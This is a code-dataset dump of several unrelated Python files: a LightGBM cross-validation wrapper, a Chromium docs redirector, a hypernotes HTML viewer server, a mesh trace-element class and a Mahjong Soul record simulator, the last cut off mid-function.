for i, (fit_idx, val_idx) in enumerate(self.cv.split(X, y)):
# Split the dataset according to the fold indexes
if isinstance(X, pd.DataFrame):
X_fit = X.iloc[fit_idx]
X_val = X.iloc[val_idx]
else:
X_fit = X[fit_idx]
X_val = X[val_idx]
if isinstance(y, pd.Series):
y_fit = y.iloc[fit_idx]
y_val = y.iloc[val_idx]
else:
y_fit = y[fit_idx]
y_val = y[val_idx]
# https://lightgbm.readthedocs.io/en/latest/Python-API.html#lightgbm.Dataset
fit_set = lgbm.Dataset(X_fit, y_fit)
val_set = lgbm.Dataset(X_val, y_val)
# https://lightgbm.readthedocs.io/en/latest/Python-API.html#lightgbm.train
self.evals_results_[i] = {}
model = lgbm.train(
params=self.lgbm_params,
train_set=fit_set,
valid_sets=(fit_set, val_set),
valid_names=('fit', 'val'),
evals_result=self.evals_results_[i],
**kwargs
)
# Store the feature importances
self.feature_importances_['gain_{}'.format(i)] = model.feature_importance('gain')
self.feature_importances_['split_{}'.format(i)] = model.feature_importance('split')
# Store the model
self.models_.append(model)
return self
def predict(self, X):
utils.validation.check_is_fitted(self, ['models_'])
y = np.zeros(len(X))
for model in self.models_:
y += model.predict(X)
return y / len(self.models_)
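

# A minimal, hypothetical usage sketch (not part of the original module).
# It assumes a LightGBM version whose `train` still accepts `evals_result`
# (as the class above requires) and uses a tiny random regression task.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X_demo = pd.DataFrame(rng.rand(100, 3), columns=['a', 'b', 'c'])
    y_demo = X_demo['a'] * 2 + rng.rand(100)

    model = LGBMCV(objective='regression', verbosity=-1)
    model.fit(X_demo, y_demo, num_boost_round=20)

    print(model.predict(X_demo)[:5])           # averaged fold predictions
    print(model.feature_importances_.head())   # per-fold gain/split columns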
| 31.444444
| 95
| 0.565813
|
import lightgbm as lgbm
import numpy as np
import pandas as pd
from sklearn import model_selection
from sklearn import utils
class LGBMCV():
def __init__(self, cv=model_selection.KFold(n_splits=5, shuffle=True), **kwargs):
self.cv = cv
self.lgbm_params = kwargs
def fit(self, X, y=None, **kwargs):
self.models_ = []
feature_names = X.columns if isinstance(X, pd.DataFrame) else list(range(X.shape[1]))
self.feature_importances_ = pd.DataFrame(index=feature_names)
self.evals_results_ = {}
for i, (fit_idx, val_idx) in enumerate(self.cv.split(X, y)):
if isinstance(X, pd.DataFrame):
X_fit = X.iloc[fit_idx]
X_val = X.iloc[val_idx]
else:
X_fit = X[fit_idx]
X_val = X[val_idx]
if isinstance(y, pd.Series):
y_fit = y.iloc[fit_idx]
y_val = y.iloc[val_idx]
else:
y_fit = y[fit_idx]
y_val = y[val_idx]
fit_set = lgbm.Dataset(X_fit, y_fit)
val_set = lgbm.Dataset(X_val, y_val)
self.evals_results_[i] = {}
model = lgbm.train(
params=self.lgbm_params,
train_set=fit_set,
valid_sets=(fit_set, val_set),
valid_names=('fit', 'val'),
evals_result=self.evals_results_[i],
**kwargs
)
self.feature_importances_['gain_{}'.format(i)] = model.feature_importance('gain')
self.feature_importances_['split_{}'.format(i)] = model.feature_importance('split')
self.models_.append(model)
return self
def predict(self, X):
utils.validation.check_is_fitted(self, ['models_'])
y = np.zeros(len(X))
for model in self.models_:
y += model.predict(X)
return y / len(self.models_)
| true
| true
|
1c48ff1a98a5fae415b1409b2b640b5362bdfe08
| 2,357
|
py
|
Python
|
chrome/common/extensions/docs/server2/redirector.py
|
kurli/chromium-crosswalk
|
f4c5d15d49d02b74eb834325e4dff50b16b53243
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2018-11-24T07:58:44.000Z
|
2019-02-22T21:02:46.000Z
|
chrome/common/extensions/docs/server2/redirector.py
|
carlosavignano/android_external_chromium_org
|
2b5652f7889ccad0fbdb1d52b04bad4c23769547
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
chrome/common/extensions/docs/server2/redirector.py
|
carlosavignano/android_external_chromium_org
|
2b5652f7889ccad0fbdb1d52b04bad4c23769547
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2017-07-31T19:09:52.000Z
|
2019-01-04T18:48:50.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import posixpath
from urlparse import urlsplit
from file_system import FileNotFoundError
from third_party.json_schema_compiler.json_parse import Parse
class Redirector(object):
def __init__(self, compiled_fs_factory, file_system, root_path):
self._root_path = root_path
self._file_system = file_system
self._cache = compiled_fs_factory.Create(
lambda _, rules: Parse(rules), Redirector)
def Redirect(self, host, path):
''' Check if a path should be redirected, first according to host
redirection rules, then from rules in redirects.json files.
Returns the path that should be redirected to, or None if no redirection
should occur.
'''
return self._RedirectOldHosts(host, path) or self._RedirectFromConfig(path)
def _RedirectFromConfig(self, url):
''' Lookup the redirects configuration file in the directory that contains
the requested resource. If no redirection rule is matched, or no
configuration file exists, returns None.
'''
dirname, filename = posixpath.split(url)
try:
rules = self._cache.GetFromFile(
posixpath.join(self._root_path, dirname, 'redirects.json'))
except FileNotFoundError:
return None
redirect = rules.get(filename)
if redirect is None:
return None
if (redirect.startswith('/') or
urlsplit(redirect).scheme in ('http', 'https')):
return redirect
return posixpath.normpath('/' + posixpath.join(dirname, redirect))
def _RedirectOldHosts(self, host, path):
''' Redirect paths from the old code.google.com to the new
developer.chrome.com, retaining elements like the channel and https, if
used.
'''
if urlsplit(host).hostname != 'code.google.com':
return None
path = path.split('/')
if path and path[0] == 'chrome':
path.pop(0)
return 'https://developer.chrome.com/' + posixpath.join(*path)
def Cron(self):
''' Load files during a cron run.
'''
for root, dirs, files in self._file_system.Walk(self._root_path):
if 'redirects.json' in files:
self._cache.GetFromFile('%s/redirects.json' % posixpath.join(
self._root_path, root).rstrip('/'))
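
# Illustrative (hypothetical) redirects.json showing the three rule forms
# _RedirectFromConfig understands:
#
#   { "index.html": "/newpath",                # absolute path, returned as-is
#     "faq.html": "https://example.com/faq",   # full URL, returned as-is
#     "old.html": "new.html" }                 # relative, joined with dirname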
| 33.671429
| 79
| 0.698345
|
import posixpath
from urlparse import urlsplit
from file_system import FileNotFoundError
from third_party.json_schema_compiler.json_parse import Parse
class Redirector(object):
def __init__(self, compiled_fs_factory, file_system, root_path):
self._root_path = root_path
self._file_system = file_system
self._cache = compiled_fs_factory.Create(
lambda _, rules: Parse(rules), Redirector)
def Redirect(self, host, path):
return self._RedirectOldHosts(host, path) or self._RedirectFromConfig(path)
def _RedirectFromConfig(self, url):
dirname, filename = posixpath.split(url)
try:
rules = self._cache.GetFromFile(
posixpath.join(self._root_path, dirname, 'redirects.json'))
except FileNotFoundError:
return None
redirect = rules.get(filename)
if redirect is None:
return None
if (redirect.startswith('/') or
urlsplit(redirect).scheme in ('http', 'https')):
return redirect
return posixpath.normpath('/' + posixpath.join(dirname, redirect))
def _RedirectOldHosts(self, host, path):
if urlsplit(host).hostname != 'code.google.com':
return None
path = path.split('/')
if path and path[0] == 'chrome':
path.pop(0)
return 'https://developer.chrome.com/' + posixpath.join(*path)
def Cron(self):
for root, dirs, files in self._file_system.Walk(self._root_path):
if 'redirects.json' in files:
self._cache.GetFromFile('%s/redirects.json' % posixpath.join(
self._root_path, root).rstrip('/'))
| true
| true
|
1c48ff67557b59e0f6442687560f6b0bab68e410
| 5,974
|
py
|
Python
|
hypernotes/__main__.py
|
binste/hypernotes
|
4c9b82b7431f6af565318df58c03e764e9490eff
|
[
"MIT"
] | 3
|
2019-05-12T13:18:54.000Z
|
2020-08-29T02:25:05.000Z
|
hypernotes/__main__.py
|
binste/hypernotes
|
4c9b82b7431f6af565318df58c03e764e9490eff
|
[
"MIT"
] | null | null | null |
hypernotes/__main__.py
|
binste/hypernotes
|
4c9b82b7431f6af565318df58c03e764e9490eff
|
[
"MIT"
] | null | null | null |
import argparse
import json
import sys
import textwrap
import webbrowser
from datetime import datetime
from http.server import BaseHTTPRequestHandler, HTTPServer
from json import JSONEncoder
from typing import List
from hypernotes import (
Note,
Store,
_all_keys_from_dicts,
_flatten_notes,
_format_datetime,
_key_order,
)
class DatetimeNonReversibleJSONEncoder(JSONEncoder):
"""Encodes datetime objects as a string representation"""
def default(self, obj):
if isinstance(obj, datetime):
return _format_datetime(obj)
return super().default(obj)
def _format_notes_as_html(notes: List[Note]):
flat_dicts = _flatten_notes(notes)
all_keys = _all_keys_from_dicts(flat_dicts)
key_order = _key_order(all_keys)
data = [] # type: List[dict]
for d in flat_dicts:
row = {} # type: dict
for col in key_order:
row[col] = d.get(col, "")
data.append(row)
js_var_data = json.dumps(data, cls=DatetimeNonReversibleJSONEncoder)
    # Dots in column names must be escaped for DataTables' 'data' attribute
escaped_columns = [col.replace(".", "\\\\.") for col in key_order]
js_columns = "[" + ", ".join(f'{{data: "{col}"}}' for col in escaped_columns) + "]"
js_table_tr = "<tr>" + "".join(f"<th>{col}</th>" for col in key_order) + "</tr>"
html_start = _html_start()
html_header = _html_header(js_var_data, js_columns)
html_body = _html_body(js_table_tr)
html_end = "</html>"
return html_start + html_header + html_body + html_end
def _html_start() -> str:
return textwrap.dedent(
"""\
<!DOCTYPE html>
<html>
"""
)
def _html_header(js_var_data: str, js_columns: str) -> str:
return textwrap.dedent(
f"""\
<head>
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap4.min.css">
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap4.min.js"></script>
<script type="text/javascript" class="init">
var data = {js_var_data}
$(document).ready(function () {{
$('#store_table').DataTable({{
data: data,
columns: {js_columns},
scrollX: true,
scrollY: '60vh',
scrollCollapse: true,
}}
);
}});
</script>
<style type="text/css" class="init">
div.dataTables_wrapper {{
width: 100%;
margin: 0 auto;
}}
th {{ font-size: 14px; }}
td {{ font-size: 13px; }}
</style>
<meta charset=utf-8 />
<title>Store - DataTable</title>
</head>
"""
)
def _html_body(js_table_tr: str) -> str:
return textwrap.dedent(
f"""\
<body>
<div class="page-header text-center">
<h1>Store Content</h1>
</div>
<hr>
<div class="container-fluid">
<div class="row mx-5">
<table id="store_table" class="table table-striped table-bordered" style="width:100%">
<thead>
{js_table_tr}
</thead>
</table>
</div>
</div>
</body>
"""
)
class HTMLResponder(BaseHTTPRequestHandler):
def do_GET(self):
html = _format_notes_as_html(store.load())
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(html.encode("utf-8"))
def _parse_args(args):
parser = argparse.ArgumentParser(
"This command-line interface can be used to"
+ " get a quick glance into a store.\n\nIt will start an http server and"
+ " automatically open the relevant page in your web browser."
+ " The page will contain an interactive table showing the most relevant"
+ " information of all notes in the store such as metrics, parameters, etc."
)
parser.add_argument("store_path", type=str, help="path to json store")
parser.add_argument(
"--ip",
type=str,
default="localhost",
help="ip to use for hosting the http server (default=localhost)",
)
parser.add_argument(
"--port", type=int, default=8080, help="port for http server (default=8080)"
)
parser.add_argument(
"--no-browser",
action="store_true",
help="can be passed to prevent automatic opening of web browser",
)
return parser.parse_args(args)
def main(raw_args):
global store
args = _parse_args(raw_args)
store = Store(args.store_path)
try:
server = HTTPServer((args.ip, args.port), HTMLResponder)
url = f"http://{args.ip}:{args.port}"
print(f"Started server on {url}. Server can be stopped with control+c / ctrl+c")
if not args.no_browser:
webbrowser.open_new_tab(url)
server.serve_forever()
except KeyboardInterrupt:
        print("\nKeyboard interrupt received. Shutting down...")
server.socket.close()
if __name__ == "__main__":
main(sys.argv[1:])
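
# Typical invocation (illustrative; the file lives at hypernotes/__main__.py,
# so it can be run as a module):
#
#   python -m hypernotes path/to/store.json --port 8080 --no-browser
#
# which serves the interactive table at http://localhost:8080.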
| 32.291892
| 147
| 0.565283
|
import argparse
import json
import sys
import textwrap
import webbrowser
from datetime import datetime
from http.server import BaseHTTPRequestHandler, HTTPServer
from json import JSONEncoder
from typing import List
from hypernotes import (
Note,
Store,
_all_keys_from_dicts,
_flatten_notes,
_format_datetime,
_key_order,
)
class DatetimeNonReversibleJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return _format_datetime(obj)
return super().default(obj)
def _format_notes_as_html(notes: List[Note]):
flat_dicts = _flatten_notes(notes)
all_keys = _all_keys_from_dicts(flat_dicts)
key_order = _key_order(all_keys)
    data = []
    for d in flat_dicts:
        row = {}
        for col in key_order:
row[col] = d.get(col, "")
data.append(row)
js_var_data = json.dumps(data, cls=DatetimeNonReversibleJSONEncoder)
escaped_columns = [col.replace(".", "\\\\.") for col in key_order]
js_columns = "[" + ", ".join(f'{{data: "{col}"}}' for col in escaped_columns) + "]"
js_table_tr = "<tr>" + "".join(f"<th>{col}</th>" for col in key_order) + "</tr>"
html_start = _html_start()
html_header = _html_header(js_var_data, js_columns)
html_body = _html_body(js_table_tr)
html_end = "</html>"
return html_start + html_header + html_body + html_end
def _html_start() -> str:
return textwrap.dedent(
"""\
<!DOCTYPE html>
<html>
"""
)
def _html_header(js_var_data: str, js_columns: str) -> str:
return textwrap.dedent(
f"""\
<head>
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap4.min.css">
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script type="text/javascript" language="javascript" src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap4.min.js"></script>
<script type="text/javascript" class="init">
var data = {js_var_data}
$(document).ready(function () {{
$('#store_table').DataTable({{
data: data,
columns: {js_columns},
scrollX: true,
scrollY: '60vh',
scrollCollapse: true,
}}
);
}});
</script>
<style type="text/css" class="init">
div.dataTables_wrapper {{
width: 100%;
margin: 0 auto;
}}
th {{ font-size: 14px; }}
td {{ font-size: 13px; }}
</style>
<meta charset=utf-8 />
<title>Store - DataTable</title>
</head>
"""
)
def _html_body(js_table_tr: str) -> str:
return textwrap.dedent(
f"""\
<body>
<div class="page-header text-center">
<h1>Store Content</h1>
</div>
<hr>
<div class="container-fluid">
<div class="row mx-5">
<table id="store_table" class="table table-striped table-bordered" style="width:100%">
<thead>
{js_table_tr}
</thead>
</table>
</div>
</div>
</body>
"""
)
class HTMLResponder(BaseHTTPRequestHandler):
def do_GET(self):
html = _format_notes_as_html(store.load())
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(html.encode("utf-8"))
def _parse_args(args):
parser = argparse.ArgumentParser(
"This command-line interface can be used to"
+ " get a quick glance into a store.\n\nIt will start an http server and"
+ " automatically open the relevant page in your web browser."
+ " The page will contain an interactive table showing the most relevant"
+ " information of all notes in the store such as metrics, parameters, etc."
)
parser.add_argument("store_path", type=str, help="path to json store")
parser.add_argument(
"--ip",
type=str,
default="localhost",
help="ip to use for hosting the http server (default=localhost)",
)
parser.add_argument(
"--port", type=int, default=8080, help="port for http server (default=8080)"
)
parser.add_argument(
"--no-browser",
action="store_true",
help="can be passed to prevent automatic opening of web browser",
)
return parser.parse_args(args)
def main(raw_args):
global store
args = _parse_args(raw_args)
store = Store(args.store_path)
try:
server = HTTPServer((args.ip, args.port), HTMLResponder)
url = f"http://{args.ip}:{args.port}"
print(f"Started server on {url}. Server can be stopped with control+c / ctrl+c")
if not args.no_browser:
webbrowser.open_new_tab(url)
server.serve_forever()
except KeyboardInterrupt:
        print("\nKeyboard interrupt received. Shutting down...")
server.socket.close()
if __name__ == "__main__":
main(sys.argv[1:])
| true
| true
|
1c48ffccdfa3319a9b61c00093524eea86090cba
| 984
|
py
|
Python
|
objects/CSCG/_2d/mesh/trace/elements/element/IS.py
|
mathischeap/mifem
|
3242e253fb01ca205a76568eaac7bbdb99e3f059
|
[
"MIT"
] | 1
|
2020-10-14T12:48:35.000Z
|
2020-10-14T12:48:35.000Z
|
objects/CSCG/_2d/mesh/trace/elements/element/IS.py
|
mathischeap/mifem
|
3242e253fb01ca205a76568eaac7bbdb99e3f059
|
[
"MIT"
] | null | null | null |
objects/CSCG/_2d/mesh/trace/elements/element/IS.py
|
mathischeap/mifem
|
3242e253fb01ca205a76568eaac7bbdb99e3f059
|
[
"MIT"
] | null | null | null |
from screws.freeze.base import FrozenOnly
class _2dCSCG_TraceElement_IS(FrozenOnly):
""""""
def __init__(self, element):
""""""
self._element_ = element
self._shared_by_cores_ = None
self._freeze_self_()
@property
def on_mesh_boundary(self):
return self._element_._ondb_
@property
def on_periodic_boundary(self):
return self._element_._onpb_
@property
def shared_by_cores(self):
""""""
if self._shared_by_cores_ is None:
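            # An interior trace element is shared between cores iff at least
            # one of its two neighbouring mesh elements is not in this core's
            # local element set.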
if self.on_mesh_boundary:
self._shared_by_cores_ = False
else:
if int(self._element_._p1_[:-1]) in self._element_._elements_._mesh_.elements and \
int(self._element_._p2_[:-1]) in self._element_._elements_._mesh_.elements:
self._shared_by_cores_ = False
else:
self._shared_by_cores_ = True
return self._shared_by_cores_
| 28.114286
| 99
| 0.601626
|
from screws.freeze.base import FrozenOnly
class _2dCSCG_TraceElement_IS(FrozenOnly):
def __init__(self, element):
self._element_ = element
self._shared_by_cores_ = None
self._freeze_self_()
@property
def on_mesh_boundary(self):
return self._element_._ondb_
@property
def on_periodic_boundary(self):
return self._element_._onpb_
@property
def shared_by_cores(self):
if self._shared_by_cores_ is None:
if self.on_mesh_boundary:
self._shared_by_cores_ = False
else:
if int(self._element_._p1_[:-1]) in self._element_._elements_._mesh_.elements and \
int(self._element_._p2_[:-1]) in self._element_._elements_._mesh_.elements:
self._shared_by_cores_ = False
else:
self._shared_by_cores_ = True
return self._shared_by_cores_
| true
| true
|
1c4900032cd45dc5468c37bdc9b924e6040e0960
| 11,860
|
py
|
Python
|
majsoul/simulator.py
|
canuse/majsoul-record-parser
|
33e7e42c5e852e44f4be8e79f6af07737b4f43af
|
[
"MIT"
] | 1
|
2019-12-03T12:12:37.000Z
|
2019-12-03T12:12:37.000Z
|
majsoul/simulator.py
|
canuse/majsoul-record-parser
|
33e7e42c5e852e44f4be8e79f6af07737b4f43af
|
[
"MIT"
] | 3
|
2019-11-28T10:09:42.000Z
|
2019-12-20T14:04:20.000Z
|
majsoul/simulator.py
|
canuse/majsoul-record-parser
|
33e7e42c5e852e44f4be8e79f6af07737b4f43af
|
[
"MIT"
] | null | null | null |
from majsoul.parser import *
from majsoul.reasoner import *
from majsoul.template import *
class simulator:
def __init__(self, record: Game, username):
self.record = record
self.playername = username
self.users = record.players.playernames
self.posInUser = self.users.index(self.playername)
self.gametype = 0
self.playernum = record.players.num
self.isrichi = False
self.report = [games(record.uuid)]
self.melds = []
def simulate(self):
for i in self.record.roundList:
self.simulateRound(i)
def initround(self, roundData: Round):
self.handtile = roundData.handTiles[self.posInUser]
for i in range(len(self.handtile)):
if self.handtile[i] in ['0s', '0m', '0p']:
self.handtile[i] = Tile.valueToTile(Tile.tileToValue(self.handtile[i]))
self.visibleTile = [0 for i in range(38)]
self.doraNum = 1
self.paishan = roundData.paishan
self.isrichi = False
self.melds = []
self.game = game(str(roundData))
for i in self.handtile:
self.visibleTile[Tile.tileToValue(i)] += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-9])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-5])] += 1
def deal(self, item: Item):
if item.isliqi == 1:
self.isrichi = True
if item.playername == self.playername:
xh, choices = self.calculateBest()
allchoice = [i[0] for i in choices]
goodchoice = []
for i in choices:
if i[1] == choices[0][1]:
goodchoice.append(i[0])
cc = []
for i in choices:
tmp = ''
for j in i[-1]:
tmp = tmp + Tile.tileToUtf(Tile.valueToTile(j))
cc.append((Tile.tileToUtf(i[0]), i[1], i[2], tmp))
if Tile.valueToTile(Tile.tileToValue(item.tile)) in allchoice:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
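                # Two-draw win estimate: with n unseen tiles and p winning
                # tiles, P(win within the next two draws) =
                # 1 - (1 - p/n) * (1 - p/(n-1)); wrong_rate below compares
                # the player's discard against the best discard on this basis.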
bestRateP = choices[0][1]
yourRateP = choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1]
bestRate = 1 - (1 - bestRateP / invisibleTiles) * (1 - bestRateP / (invisibleTiles - 1))
yourRate = 1 - (1 - yourRateP / invisibleTiles) * (1 - yourRateP / (invisibleTiles - 1))
wrong_rate = 1 - yourRate / bestRate
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, wrong_rate, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice],
choices[allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][2],
choices[0][2], len(self.game.round) + 1, bestRateP, yourRateP, cc)
self.game.round.append(tround)
print(
'Your choice:{0},{1} Best choices:{2},{3}'.format(item.tile, choices[
allchoice.index(Tile.valueToTile(Tile.tileToValue(item.tile)))][1],
choices[0][0], choices[0][1]))
else:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
melds = []
for i in self.melds:
melds.extend(i)
ht = ''
for i in self.handtile:
ht = ht + Tile.tileToUtf(i)
tround = round(self.isrichi, 1, melds, ht,
Tile.tileToUtf(item.tile), [Tile.tileToUtf(i) for i in allchoice],
[Tile.tileToUtf(i) for i in goodchoice], choices[0][2] + 1, choices[0][2],
len(self.game.round) + 1,
bestRateP, -1, cc)
self.game.round.append(tround)
                print('discarded tile not among computed choices')
            # TODO: investigate why the discarded tile can be missing from
            # the reasoner's choice list.
            print(item.tile, self.handtile)
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def discard(self, item: Item):
if item.playername != self.playername:
return
        # Red fives ('0s'/'0m'/'0p') normalize to the same plain tile value,
        # so both cases reduce to a single append.
        self.handtile.append(Tile.valueToTile(Tile.tileToValue(item.tile)))
        self.handtile.sort(key=Tile.tileToValue)
self.visibleTile[Tile.tileToValue(item.tile)] += 1
def babei(self, item: Item):
if item.playername == self.playername:
self.handtile.remove('4z')
            self.melds.append((Tile.tileToUtf('4z'),))  # single-tile meld
return
self.visibleTile[34] += 1
def chi(self, item: Item):
if item.playername == self.playername:
if item.eatstatus == 1:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.nextTile(Tile.nextTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.nextTile(Tile.nextTile(item.tile)))))
if item.eatstatus == 2:
self.handtile.remove(Tile.nextTile(item.tile))
self.handtile.remove(Tile.prevTile(item.tile))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.nextTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(item.tile))))
if item.eatstatus == 3:
self.handtile.remove(Tile.prevTile(item.tile))
self.handtile.remove(Tile.prevTile(Tile.prevTile(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(Tile.prevTile(item.tile)),
Tile.tileToUtf(Tile.prevTile(Tile.prevTile(item.tile)))))
return
else:
if item.eatstatus == 1:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.nextTile(Tile.nextTile(item.tile)))] += 1
if item.eatstatus == 2:
self.visibleTile[Tile.tileToValue(Tile.nextTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
if item.eatstatus == 3:
self.visibleTile[Tile.tileToValue(Tile.prevTile(item.tile))] += 1
self.visibleTile[Tile.tileToValue(Tile.prevTile(Tile.prevTile(item.tile)))] += 1
def peng(self, item: Item):
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 2
def gang(self, item: Item):
self.doraNum += 1
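        # Each kan reveals one more dora indicator from the dead wall; the
        # wall offsets differ between 3- and 4-player games.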
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def addGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.remove((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile)))
self.melds.append((Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile),
Tile.tileToUtf(item.tile)))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 3
def anGang(self, item: Item):
self.doraNum += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-7 - 2 * self.doraNum])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-3 - 2 * self.doraNum])] += 1
if item.playername == self.playername:
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.handtile.remove(Tile.valueToTile(Tile.tileToValue(item.tile)))
self.melds.append(
(Tile.tileToUtf('8z'), Tile.tileToUtf(item.tile), Tile.tileToUtf(item.tile), Tile.tileToUtf('8z')))
return
else:
self.visibleTile[Tile.tileToValue(item.tile)] += 4
def calculateBest(self):
a = reasoner()
choices, xh = a.discardTileList([Tile.tileToValue(i) for i in self.handtile], self.playernum)
bestChoices = []
for i in choices.keys():
tmp = 0
for j in choices[i][0]:
tmp += 4 - self.visibleTile[j]
bestChoices.append((i, tmp, choices[i][1], choices[i][0]))
bestChoices.sort(key=lambda x: x[1], reverse=True)
return xh, bestChoices
def simulateRound(self, roundData: Round):
self.initround(roundData)
print('new round!!!')
for i in roundData.itemList:
if i.op.value == 1:
self.deal(i)
if i.op.value == 2:
self.discard(i)
if i.op.value == 10:
self.babei(i)
if i.op.value == -1:
self.chi(i)
if i.op.value == -2:
self.peng(i)
if i.op.value == -3:
self.gang(i)
if i.op.value == -4:
self.addGang(i)
if i.op.value == -5:
self.anGang(i)
if i.op.value == 0 or i.op.value == -10:
self.report[0].game.append(self.game)
| 46.509804
| 115
| 0.536509
|
from majsoul.parser import *
from majsoul.reasoner import *
from majsoul.template import *
class simulator:
def __init__(self, record: Game, username):
self.record = record
self.playername = username
self.users = record.players.playernames
self.posInUser = self.users.index(self.playername)
self.gametype = 0
self.playernum = record.players.num
self.isrichi = False
self.report = [games(record.uuid)]
self.melds = []
def simulate(self):
for i in self.record.roundList:
self.simulateRound(i)
def initround(self, roundData: Round):
self.handtile = roundData.handTiles[self.posInUser]
for i in range(len(self.handtile)):
if self.handtile[i] in ['0s', '0m', '0p']:
self.handtile[i] = Tile.valueToTile(Tile.tileToValue(self.handtile[i]))
self.visibleTile = [0 for i in range(38)]
self.doraNum = 1
self.paishan = roundData.paishan
self.isrichi = False
self.melds = []
self.game = game(str(roundData))
for i in self.handtile:
self.visibleTile[Tile.tileToValue(i)] += 1
if self.playernum == 3:
self.visibleTile[Tile.tileToValue(self.paishan[-9])] += 1
else:
self.visibleTile[Tile.tileToValue(self.paishan[-5])] += 1
def deal(self, item: Item):
if item.isliqi == 1:
self.isrichi = True
if item.playername == self.playername:
xh, choices = self.calculateBest()
allchoice = [i[0] for i in choices]
goodchoice = []
for i in choices:
if i[1] == choices[0][1]:
goodchoice.append(i[0])
cc = []
for i in choices:
tmp = ''
for j in i[-1]:
tmp = tmp + Tile.tileToUtf(Tile.valueToTile(j))
cc.append((Tile.tileToUtf(i[0]), i[1], i[2], tmp))
if Tile.valueToTile(Tile.tileToValue(item.tile)) in allchoice:
invisibleTiles = 0
for i in range(38):
if i in [0, 10, 20, 30]:
continue
if self.playernum == 3:
if i in [2, 3, 4, 5, 6, 7, 8]:
continue
invisibleTiles += 4 - self.visibleTile[i]
bestRateP = choices[0][1]
